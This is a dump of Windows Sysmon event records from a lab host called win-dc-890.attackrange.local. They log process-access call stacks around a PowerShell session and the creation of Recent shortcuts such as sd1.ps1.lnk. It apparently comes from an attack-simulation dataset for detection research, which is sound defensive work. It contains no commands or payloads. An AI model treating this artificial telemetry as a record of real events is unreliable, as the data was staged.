08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf72aad6.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.799{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.761{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.761{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.730{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.730{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.730{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.714{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001052632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.699{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001052631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.699{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=A1920FFB99EBC00DBFD0FB3C2892097D,SHA256=6E4CC3AB44A361E4A311CB8C7203335C17F1816E641E41C33CD161799A2B3BE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.661{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 23542300x80000000000000001052629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.661{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnkMD5=4960A9F5E5F5517F9E19E4747AD6B06D,SHA256=40786E25937F093830F8F2C4FE46BF3C38EB995DA4997942A0F09487BBB73A20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.615{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.615{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.615{466BC892-F715-60EB-B87D-00000000CF01}93808372C:\Windows\system32\conhost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F715-60EB-B87D-00000000CF01}9380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:29.599{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.599{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
